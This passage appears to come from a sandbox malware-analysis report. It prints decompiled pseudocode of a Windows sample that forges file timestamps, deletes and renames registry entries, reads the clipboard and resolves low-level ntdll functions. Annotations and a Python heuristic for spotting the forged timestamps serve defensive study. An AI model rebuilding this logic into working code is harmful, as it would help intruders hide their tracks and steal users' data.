                                    					SetPropA( *(_t53 + 0xc), "WNDPROC", SetWindowLongA( *(_t53 + 0xc), 0xfffffffc, E2403F404)); // 0xfffffffc = GWL_WNDPROC: subclass the window and keep the previous procedure in the WNDPROC property
                                    				}
                                    				_t40 =  *0x2405aa58; // 0x190
                                    				 *((intOrPtr*)(_t53 + 0x10)) = _t40;
                                    				 *0x2405aa58 =  *0x2405aa58 + 1;
                                    				 *((intOrPtr*)( *_t53 + 8))();
                                    				_pop(_t66);
                                    				 *[fs:eax] = _t66;
                                    				_push(0x2403f58e);
                                    				_t67 =  *0x2403f17c; // 0x2403f180
                                    				return E24013A90( &_v100, _t67);
                                    			}

                                    APIs
                                    • IsWindow.USER32(00000000), ref: 2403F51F
                                    • SetPropA.USER32(?,OBJECT), ref: 2403F532
                                    • SetWindowLongA.USER32(?,000000FC,Function_0002F404), ref: 2403F542
                                    • SetPropA.USER32(?,WNDPROC,00000000), ref: 2403F551
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: PropWindow$Long
                                    • String ID: OBJECT$WNDPROC
                                    • API String ID: 109861939-55689305
                                    • Opcode ID: b8f2cde3581741474a11c43c416164d5a479efaee05fabb6b2a69ac8dc819c9c
                                    • Instruction ID: 1d2f1fba51eaf9d3371a9f3b69457846cba72164b74373c8b89b8259225635f7
                                    • Opcode Fuzzy Hash: b8f2cde3581741474a11c43c416164d5a479efaee05fabb6b2a69ac8dc819c9c
                                    • Instruction Fuzzy Hash: 67315C75A00244AFEB00DFA9CC80D6EBBFCEB4D2147908164B909EB248DA74ED858B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E2401757C(char __eax, void* __ebx, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				struct _FILETIME _v16;
                                    				void* _t43;
                                    				intOrPtr _t46;
                                    				CHAR* _t48;
                                    				void* _t51;
                                    
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t51);
                                    				_push(0x24017659);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51 + 0xfffffff4;
                                    				E24011644();
                                    				_v16.dwLowDateTime = E24011D10(0x1869f) + 0x1c52fa0; // 0x1869f = 99999; low and high DWORD each get their own draw
                                    				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
                                    				_t48 = E24013534(_v8);
                                    				_t43 = CreateFileA(_t48, 0x40000000, 3, 0, 3, 0x80, 0); // GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
                                    				if(_t43 != 0xffffffff) {
                                    					SetFileTime(_t43,  &_v16,  &_v16,  &_v16); // one value written as creation, last-access and last-write time
                                    				} else {
                                    					CloseHandle(_t43); // called on INVALID_HANDLE_VALUE; the retry below uses attribute 4 = FILE_ATTRIBUTE_SYSTEM
                                    					_t43 = CreateFileA(_t48, 0x40000000, 3, 0, 3, 4, 0);
                                    					if(_t43 != 0xffffffff) {
                                    						SetFileTime(_t43,  &_v16,  &_v16,  &_v16);
                                    					}
                                    					CloseHandle(_t43);
                                    				}
                                    				CloseHandle(_t43); // second CloseHandle on the same handle in the retry path
                                    				_pop(_t46);
                                    				 *[fs:eax] = _t46;
                                    				_push(E24017660);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                      • Part of subcall function 24011644: GetSystemTime.KERNEL32(?), ref: 2401164E
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175E3
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175F0
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 24017605
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000), ref: 2401761E
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000), ref: 24017624
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 24017638
                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 2401763E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleTime$Create$System
                                    • String ID:
                                    • API String ID: 1407650207-0
                                    • Opcode ID: 248d9557b9827f86a3859ba98dfe5ca60f5e8233a2f1db804991b18af16d4c39
                                    • Instruction ID: cce0819a14111f05abb4ab3b1e489f85c6af480bc88e6038b0c6e40ae658b53f
                                    • Opcode Fuzzy Hash: 248d9557b9827f86a3859ba98dfe5ca60f5e8233a2f1db804991b18af16d4c39
                                    • Instruction Fuzzy Hash: 2421D5B5A00208BAF712E7B4DC81F9E77ECEB18618F500161B218FA1C5DB74AB804754
                                    Uniqueness

                                    Uniqueness Score: -1.00%
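What the routine above writes with SetFileTime is easier to judge as calendar dates. The Python below is an added example, not code from the sample or from the report: it rebuilds the FILETIME from the arithmetic in the listing (two draws of E24011D10(0x1869f), each offset by 0x1c52fa0; E24011D10 is assumed to be Delphi's Random(Range), so each draw lies in [0, 99998]), converts the two extremes to dates, and gives a check for files stamped this way. No real file is touched; the inputs are constructed.

```python
"""Timestamp the SetFileTime routine produces, and a heuristic to spot it."""
from __future__ import annotations
from datetime import datetime, timedelta, timezone

RANDOM_RANGE = 0x1869F        # argument passed to E24011D10 in the listing
BASE = 0x1C52FA0              # constant added to each draw
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def sample_filetime(r_low: int, r_high: int) -> int:
    """64-bit FILETIME for two draws of the random helper (assumed Random(99999))."""
    low = (r_low + BASE) & 0xFFFFFFFF
    high = (r_high + BASE) & 0xFFFFFFFF
    return (high << 32) | low


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME is 100 ns ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)


def stamped_date_range() -> tuple[datetime, datetime]:
    """Earliest and latest date the routine can write; the high DWORD dominates."""
    lo = filetime_to_datetime(sample_filetime(0, 0))
    hi = filetime_to_datetime(sample_filetime(RANDOM_RANGE - 1, RANDOM_RANGE - 1))
    return lo, hi


def looks_stamped(created: int, accessed: int, written: int) -> bool:
    """True when the three $STANDARD_INFORMATION FILETIMEs are identical to the
    tick and the high DWORD lies in the routine's range. Under normal use the
    three drift apart, and last-access rarely equals creation exactly."""
    if not (created == accessed == written):
        return False
    high = created >> 32
    return BASE <= high < BASE + RANDOM_RANGE
```

Because SetFileTime rewrites only the $STANDARD_INFORMATION timestamps, the $FILE_NAME timestamps in the MFT record still carry the file's real creation time; comparing the two attributes is the usual way to confirm what this heuristic flags.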

                                    C-Code - Quality: 100%
                                    			E2405352C() {
                                    				struct HINSTANCE__* _t2;
                                    				struct HINSTANCE__* _t4;
                                    
                                    				 *0x2405aab4 = LoadLibraryA("ntdll.dll");
                                    				if( *0x2405aab4 != 0) {
                                    					_t2 =  *0x2405aab4; // 0x0
                                    					 *0x2405aaac = GetProcAddress(_t2, "RtlInitUnicodeString");
                                    					_t4 =  *0x2405aab4; // 0x0
                                    					 *0x2405aab0 = GetProcAddress(_t4, "ZwOpenSection");
                                    					return 1;
                                    				} else {
                                    					return 0;
                                    				}
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(ntdll.dll,2405394B,2405B980,?,24053A12,24056642,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000), ref: 24053531
                                    • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 24053552
                                    • GetProcAddress.KERNEL32(00000000,ZwOpenSection), ref: 24053567
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: RtlInitUnicodeString$ZwOpenSection$ntdll.dll
                                    • API String ID: 2238633743-2527063403
                                    • Opcode ID: 74c764fe895b31fd8ffc635cfa556f6c31b92a6b12ecd93a857e87dddaad3bdf
                                    • Instruction ID: c858ca5bb0f7c34774f4b02a9dd1df5d3543f06064f991b9fbde3d4086b0f7ca
                                    • Opcode Fuzzy Hash: 74c764fe895b31fd8ffc635cfa556f6c31b92a6b12ecd93a857e87dddaad3bdf
                                    • Instruction Fuzzy Hash: E9E0ECB18112049FE701AFBAC654B0D7798F715209B801438F104EB918D77D82CC8F60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 61%
                                    			E2402B3CC(char __eax, long __ebx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				void* _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				intOrPtr _v36;
                                    				char _v40;
                                    				void* _t83;
                                    				void* _t89;
                                    				void* _t95;
                                    				char* _t100;
                                    				long _t107;
                                    				void* _t125;
                                    				void* _t131;
                                    				char* _t136;
                                    				long _t145;
                                    				long _t166;
                                    				void* _t170;
                                    				char _t190;
                                    				void* _t192;
                                    				void* _t194;
                                    				intOrPtr _t195;
                                    				void* _t199;
                                    				void* _t201;
                                    				intOrPtr _t213;
                                    				intOrPtr _t214;
                                    
                                    				_t211 = __esi;
                                    				_t210 = __edi;
                                    				_t166 = __ebx;
                                    				_t213 = _t214;
                                    				_t170 = 4;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t170 = _t170 - 1;
                                    				} while (_t170 != 0);
                                    				_push(_t170);
                                    				_push(__ebx);
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t213);
                                    				_push(0x2402b63d);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t214;
                                    				E24013120( &_v20, _v8);
                                    				E24013590(_v20, E24013674(0x2402b654, _v20) - 1, 1,  &_v24);
                                    				E240135D0( &_v20, E24013674(0x2402b654, _v20), 1);
                                    				_t83 = E2401333C(_v20);
                                    				_t190 = _v20;
                                    				_t216 =  *((char*)(_t190 + _t83 - 1)) - 0x5c;
                                    				if( *((char*)(_t190 + _t83 - 1)) != 0x5c) { // 0x5c = '\': no trailing backslash means "delete a value", otherwise "delete a key and its subtree"
                                    					_push( &_v16);
                                    					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, __eflags) + 1);
                                    					_t89 = E2401333C(_v20);
                                    					_pop(_t192);
                                    					E24013590(_v20, _t89, _t192);
                                    					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, __eflags));
                                    					_t95 = E2401333C(_v20);
                                    					_pop(_t194);
                                    					E240135D0( &_v20, _t95, _t194);
                                    					_t100 = E24013534(_v20);
                                    					RegOpenKeyExA(E2402B224(_v24, __ebx, __eflags), _t100, 0, 2,  &_v12); // samDesired 2 = KEY_SET_VALUE
                                    					_t107 = RegDeleteValueA(_v12, E24013534(_v16));
                                    					_t107 = _t107 == 0;
                                    				} else {
                                    					E24013590(_v20, E2401333C(_v20) - 1, 1,  &_v20);
                                    					_push( &_v16);
                                    					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, _t216) + 1);
                                    					_t125 = E2401333C(_v20);
                                    					_pop(_t199);
                                    					E24013590(_v20, _t125, _t199);
                                    					_push(E2402B35C(_v20, __ebx, 0x5c, __edi, __esi, _t216));
                                    					_t131 = E2401333C(_v20);
                                    					_pop(_t201);
                                    					E240135D0( &_v20, _t131, _t201);
                                    					_t136 = E24013534(_v20);
                                    					RegOpenKeyExA(E2402B224(_v24, __ebx, _t216), _t136, 0, 0x20006,  &_v12); // samDesired 0x20006 = KEY_WRITE; subkeys are deleted recursively before RegDeleteKeyA
                                    					E2402A9BC(_v8, __ebx,  &_v32, __edi, __esi, _t216);
                                    					if(_v32 != 0) {
                                    						E2402A9BC(_v8, __ebx,  &_v28, _t210, _t211, __eflags);
                                    						while(1) {
                                    							_t145 = E24013674(0x2402b660, _v28);
                                    							__eflags = _t145;
                                    							if(_t145 <= 0) {
                                    								break;
                                    							}
                                    							_push(_v8);
                                    							E24013590(_v28, E24013674(0x2402b660, _v28) - 1, 1,  &_v40);
                                    							_push(_v40);
                                    							_push(0x2402b654);
                                    							E240133FC();
                                    							_t166 = E2402B3CC(_v36, _t166, _t210, _t211);
                                    							__eflags = _t166;
                                    							if(_t166 != 0) {
                                    								E240135D0( &_v28, E24013674(0x2402b660, _v28), 1);
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						__eflags = RegDeleteKeyA(_v12, E24013534(_v16));
                                    					} else {
                                    						RegDeleteKeyA(_v12, E24013534(_v16));
                                    					}
                                    				}
                                    				RegCloseKey(_v12);
                                    				_pop(_t195);
                                    				 *[fs:eax] = _t195;
                                    				_push(0x2402b644);
                                    				E240130AC( &_v40, 7);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020006,?,?,?,?,00000000,2402B63D,?,?,00000003,00000000,00000000), ref: 2402B4CE
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402B4F1
                                    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402B63D,?,?,00000003,00000000), ref: 2402B615
                                      • Part of subcall function 2402A9BC: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,?,00000000,00000008,?,00000000,2402AB1D), ref: 2402AA71
                                      • Part of subcall function 2402A9BC: RegEnumKeyExA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,00000008,?,00000000), ref: 2402AAD4
                                      • Part of subcall function 2402A9BC: RegCloseKey.ADVAPI32(?,?,00000001,00000000,000000FF,00000000,00000000,00000000,?,?,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 2402AAE1
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 2402B58E
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000002,?,?,?,00000000,2402B63D,?,?,00000003,00000000,00000000), ref: 2402B5F5
                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000002,?,?,?,00000000,2402B63D,?,?,00000003,00000000,00000000), ref: 2402B607
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpen$Close$EnumValue
                                    • String ID:
                                    • API String ID: 1347035672-0
                                    • Opcode ID: 1a16aab594e43fda11bd511c9af2b6ffd4e7b86e5d0c95d23673eeaef833f57f
                                    • Instruction ID: d9a6e5a07206ec87fe685ba73a328b74744f1f67cc39b348b4af9fb8c1011764
                                    • Opcode Fuzzy Hash: 1a16aab594e43fda11bd511c9af2b6ffd4e7b86e5d0c95d23673eeaef833f57f
                                    • Instruction Fuzzy Hash: B7610D71A005199BFF00EBB4D884AEFB7F9FF68308F504461E519E7298DA74EE858B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 38%
                                    			E2402BC2C(void* __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
                                    				char* _v8;
                                    				void* _v12;
                                    				char _v16;
                                    				int _v20;
                                    				int _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				void* __ecx;
                                    				char* _t65;
                                    				intOrPtr _t99;
                                    				void* _t101;
                                    				void* _t102;
                                    				void* _t114;
                                    				intOrPtr _t115;
                                    				char* _t119;
                                    				void* _t121;
                                    				char* _t122;
                                    				intOrPtr _t124;
                                    				intOrPtr _t125;
                                    
                                    				_t124 = _t125;
                                    				_t99 = 5;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t99 = _t99 - 1;
                                    					_t126 = _t99;
                                    				} while (_t99 != 0);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t99;
                                    				_push(__ebx);
                                    				_v8 =  *_t1;
                                    				_t119 = __edx;
                                    				_t121 = __eax;
                                    				_push(_t124);
                                    				_push(0x2402bd96);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t125;
                                    				_push( &_v16);
                                    				E24013274( &_v28, __eax);
                                    				_push(E24013674(0x2402bdb0, _v28) - 1);
                                    				E24013274( &_v32, _t121);
                                    				_pop(_t101);
                                    				E24013590(_v32, _t101, 1);
                                    				_push( &_v12);
                                    				_push(0x2001b);
                                    				_push(0);
                                    				_push( &_v36);
                                    				E24013274( &_v40, _t121);
                                    				_push(E24013674(0x2402bdb0, _v40) + 1);
                                    				E24013274( &_v44, _t121);
                                    				_push(E2401333C(_v44));
                                    				E24013274( &_v48, _t121);
                                    				_pop(_t102);
                                    				_pop(_t114);
                                    				E24013590(_v48, _t102, _t114);
                                    				_t65 = E24013534(_v36);
                                    				if(RegOpenKeyExA(E2402B224(_v16, 0, _t126), _t65, ??, ??, ??) == 0 && RegQueryValueExA(_v12, _t119, 0,  &_v20, 0,  &_v24) == 0) {
                                    					_t122 = E24011344(_v24);
                                    					if(RegQueryValueExA(_v12, _t119, 0,  &_v20, _t122,  &_v24) == 0 && RegSetValueExA(_v12, _v8, 0, _v20, _t122, _v24) == 0) {
                                    						RegDeleteValueA(_v12, _t119);
                                    					}
                                    					E2401135C(_t122);
                                    				}
                                    				RegCloseKey(_v12);
                                    				_pop(_t115);
                                    				 *[fs:eax] = _t115;
                                    				_push(0x2402bd9d);
                                    				E240130AC( &_v48, 6);
                                    				return E24013088( &_v16);
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(00000000,00000000,?,00000000,0002001B,?,?,00000000,2402BD96,?,?,?,?,00000000,00000000), ref: 2402BCEF
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00000000,?,00000000,0002001B,?,?,00000000,2402BD96), ref: 2402BD09
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,00000000,00000000,?,00000000), ref: 2402BD2C
                                    • RegSetValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?,?,00000000,?), ref: 2402BD48
                                    • RegDeleteValueA.ADVAPI32(?,?,?,?,00000000,?,00000000,?,?,?,00000000,?,00000000,?,?), ref: 2402BD56
                                    • RegCloseKey.ADVAPI32(?,00000000,00000000,?,00000000,0002001B,?,?,00000000,2402BD96,?,?,?,?,00000000,00000000), ref: 2402BD6E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Value$Query$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 2877093821-0
                                    • Opcode ID: c7ff51e8ca8b2579c96f1e29e8fed98b9275706cd8d17edbd4f7862de7d64363
                                    • Instruction ID: a69a4bea8592afac0528f589063a7326b1332b86241eadad387ec09b713e22e2
                                    • Opcode Fuzzy Hash: c7ff51e8ca8b2579c96f1e29e8fed98b9275706cd8d17edbd4f7862de7d64363
                                    • Instruction Fuzzy Hash: BD41ED76A00518ABEF01DAA4D980FEFB7FCEF58604F504566E904F7254EA74EE818B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 71%
                                    			E24017578(intOrPtr __eax, void* __ebx, void* __edx, void* __esi) {
                                    				intOrPtr _v4;
                                    				char _v8;
                                    				struct _FILETIME _v16;
                                    				intOrPtr _v117;
                                    				void* _t45;
                                    				intOrPtr _t49;
                                    				CHAR* _t51;
                                    				void* _t54;
                                    
                                    				_pop(_t54);
                                    				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                    				_v117 = _v117 + __edx;
                                    				_v4 = __eax;
                                    				E24013524(_v4);
                                    				_push(_t54);
                                    				_push(0x24017659);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t54 + 0xfffffff4;
                                    				E24011644();
                                    				_v16.dwHighDateTime = E24011D10(0x1869f) + 0x1c52fa0;
                                    				_v8 = E24011D10(0x1869f) + 0x1c52fa0;
                                    				_t51 = E24013534(_v4);
                                    				_t45 = CreateFileA(_t51, 0x40000000, 3, 0, 3, 0x80, 0);
                                    				if(_t45 != 0xffffffff) {
                                    					SetFileTime(_t45,  &_v16,  &_v16,  &_v16);
                                    				} else {
                                    					CloseHandle(_t45);
                                    					_t45 = CreateFileA(_t51, 0x40000000, 3, 0, 3, 4, 0);
                                    					if(_t45 != 0xffffffff) {
                                    						SetFileTime(_t45,  &_v16,  &_v16,  &_v16);
                                    					}
                                    					CloseHandle(_t45);
                                    				}
                                    				CloseHandle(_t45);
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(E24017660);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                      • Part of subcall function 24011644: GetSystemTime.KERNEL32(?), ref: 2401164E
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175E3
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 240175F0
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 24017605
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000), ref: 2401761E
                                    • CloseHandle.KERNEL32(00000000,00000000,40000000,00000003,00000000,00000003,00000004,00000000,00000000,00000000,40000000,00000003,00000000,00000003,00000080,00000000), ref: 24017624
                                    • SetFileTime.KERNEL32(00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 24017638
                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,40000000,00000003,00000000,00000003,00000080,00000000,00000000,24017659), ref: 2401763E
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleTime$Create$System
                                    • String ID:
                                    • API String ID: 1407650207-0
                                    • Opcode ID: 8734682c1186f0dd38638350a5d904f5abe7541b1a56a7ff21a9356337d0594a
                                    • Instruction ID: 1ae059303b93140b314969ef159fa4e1e083943449f6f8d28b21c5887aae9a2f
                                    • Opcode Fuzzy Hash: 8734682c1186f0dd38638350a5d904f5abe7541b1a56a7ff21a9356337d0594a
                                    • Instruction Fuzzy Hash: E311E6B0A00604BEF752A774EC92F9E7BECDB19618F500261F218FB5D5DA746F804B14
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E2403CEFC(struct HWND__* __eax, intOrPtr __edx) {
                                    				intOrPtr _v8;
                                    				char _v9;
                                    				void* _v16;
                                    				struct HWND__* _t38;
                                    				void* _t42;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    				void* _t51;
                                    				void* _t53;
                                    				intOrPtr _t54;
                                    
                                    				_t51 = _t53;
                                    				_t54 = _t53 + 0xfffffff4;
                                    				_v8 = __edx;
                                    				_t38 = __eax;
                                    				_v9 = 1;
                                    				E24013088(_v8);
                                    				if(OpenClipboard(_t38) == 0) {
                                    					_v9 = 0;
                                    					return _v9;
                                    				} else {
                                    					_push(_t51);
                                    					_push(0x2403cfb3);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t54;
                                    					_v16 = GetClipboardData(1);
                                    					_t57 = _v16;
                                    					if(_v16 == 0) {
                                    						_v9 = 0;
                                    						E24013274(_v8, E24013588(_v8));
                                    						__eflags = 0;
                                    						_pop(_t47);
                                    						 *[fs:eax] = _t47;
                                    						_push(0x2403cfbe);
                                    						return CloseClipboard();
                                    					} else {
                                    						_push(_t51);
                                    						_push(0x2403cf83);
                                    						_push( *[fs:eax]);
                                    						 *[fs:eax] = _t54;
                                    						_push(GlobalSize(_v16));
                                    						_t31 = _v16;
                                    						GlobalFix(_v16);
                                    						_pop(_t42);
                                    						E24013174(_v8, _t42, _t31, _t57);
                                    						_pop(_t49);
                                    						 *[fs:eax] = _t49;
                                    						_push(0x2403cf8e);
                                    						return GlobalUnWire(_v16);
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • OpenClipboard.USER32 ref: 2403CF15
                                    • GetClipboardData.USER32(00000001), ref: 2403CF32
                                    • GlobalSize.KERNEL32(00000000), ref: 2403CF52
                                    • GlobalFix.KERNEL32(00000000), ref: 2403CF5C
                                    • GlobalUnWire.KERNEL32(00000000), ref: 2403CF7D
                                    • CloseClipboard.USER32 ref: 2403CFAD
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ClipboardGlobal$CloseDataOpenSizeWire
                                    • String ID:
                                    • API String ID: 3291160196-0
                                    • Opcode ID: 69fb62113d829d6ca270af2b7ba2215a12206daf402cbe7ea6700773f36177ba
                                    • Instruction ID: cdefa8330f274483a339700c40cb4629a957fdacaa4e905b19683dc927ff64c5
                                    • Opcode Fuzzy Hash: 69fb62113d829d6ca270af2b7ba2215a12206daf402cbe7ea6700773f36177ba
                                    • Instruction Fuzzy Hash: A211D631908204BFEB01DBF5D861B9EBFF8EB59304F9144B0F408D3644DA759E80DA61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E24042DC8(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                    				char _v8;
                                    				char _v9;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v300;
                                    				void _v344;
                                    				intOrPtr _v356;
                                    				signed int _v360;
                                    				char _v368;
                                    				char _v624;
                                    				char _v880;
                                    				void _v1200;
                                    				char _v1204;
                                    				char _v1208;
                                    				char _v1212;
                                    				char _v1468;
                                    				char _v1724;
                                    				char _v1728;
                                    				char _v1732;
                                    				char _v1736;
                                    				char _v1740;
                                    				char _v1744;
                                    				char _v1748;
                                    				char _v1752;
                                    				char _v1756;
                                    				char _v1760;
                                    				void* __ecx;
                                    				void* _t95;
                                    				void* _t101;
                                    				signed int _t105;
                                    				signed int _t118;
                                    				signed int _t121;
                                    				signed int _t174;
                                    				void* _t202;
                                    				intOrPtr _t205;
                                    				intOrPtr _t239;
                                    				char _t244;
                                    				intOrPtr _t247;
                                    				intOrPtr _t250;
                                    				intOrPtr _t255;
                                    				void* _t265;
                                    				intOrPtr _t274;
                                    				intOrPtr _t283;
                                    				intOrPtr _t293;
                                    				intOrPtr _t294;
                                    
                                    				_t290 = __esi;
                                    				_t286 = __edi;
                                    				_t293 = _t294;
                                    				_t205 = 0xdb;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t205 = _t205 - 1;
                                    				} while (_t205 != 0);
                                    				_t1 =  &_v8;
                                    				 *_t1 = _t205;
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_v9 =  *_t1;
                                    				_v8 = __edx;
                                    				_t202 = __eax;
                                    				_t239 =  *0x24015a98; // 0x24015a9c
                                    				E240139CC( &_v368, _t239);
                                    				_push(_t293);
                                    				_push(0x240431f8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t294;
                                    				E24013120( &_v16, _t202);
                                    				_t95 = E24013674(0x24043210, _v16);
                                    				E24013590(_v16, _t95 != 1, 1,  &_v1204);
                                    				E24013480(_v1204, 0x2404321c);
                                    				if(_t95 != 1) {
                                    					_t101 = E2401333C(_v16);
                                    					_t244 = _v16;
                                    					__eflags =  *((char*)(_t244 + _t101 - 1)) - 0x5c;
                                    					if( *((char*)(_t244 + _t101 - 1)) != 0x5c) {
                                    						E24013344( &_v16, 0x24043228);
                                    					}
                                    					E24013388( &_v1212, _v8, _v16);
